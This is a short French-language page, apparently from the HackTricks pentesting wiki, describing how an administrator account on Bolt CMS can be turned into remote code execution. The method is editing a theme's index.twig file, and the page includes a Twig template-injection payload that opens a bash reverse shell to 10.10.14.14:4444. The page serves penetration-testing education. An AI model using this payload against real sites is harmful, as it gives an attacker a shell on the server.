HackTricksBolt CMS
Reading time: 2 minutes
tip
Apprenez et pratiquez le hacking AWS :
HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : 
HackTricks Training GCP Red Team Expert (GRTE)
Soutenir HackTricks
- VĂ©rifiez les plans d'abonnement !
- Rejoignez le đŹ groupe Discord ou le groupe telegram ou suivez nous sur Twitter đŠ @hacktricks_live.
- Partagez des astuces de hacking en soumettant des PRs au HackTricks et HackTricks Cloud dépÎts github.
RCE
AprĂšs vous ĂȘtre connectĂ© en tant qu'administrateur (allez Ă /bot pour accĂ©der Ă l'invite de connexion), vous pouvez obtenir RCE dans Bolt CMS :
- SĂ©lectionnez
Configuration->View Configuration->Main Configurationou allez Ă l'URL/bolt/file-edit/config?file=/bolt/config.yaml - VĂ©rifiez la valeur du thĂšme
.png)
- SĂ©lectionnez
File management->View & edit templates - Sélectionnez la base de thÚme trouvée dans l'étape précédente (
base-2021dans ce cas) et sélectionnezindex.twig - Dans mon cas, cela se trouve à l'URL /bolt/file-edit/themes?file=/base-2021/index.twig
- Mettez votre payload dans ce fichier via template injection (Twig), comme :
{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}} - Et enregistrez les modifications
.png)
- Videz le cache dans
Maintenance->Clear the cache - AccĂ©dez Ă nouveau Ă la page en tant qu'utilisateur rĂ©gulier, et le payload devrait ĂȘtre exĂ©cutĂ©
tip
Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE)
Soutenir HackTricks
- VĂ©rifiez les plans d'abonnement !
- Rejoignez le đŹ groupe Discord ou le groupe telegram ou suivez nous sur Twitter đŠ @hacktricks_live.
- Partagez des astuces de hacking en soumettant des PRs au HackTricks et HackTricks Cloud dépÎts github.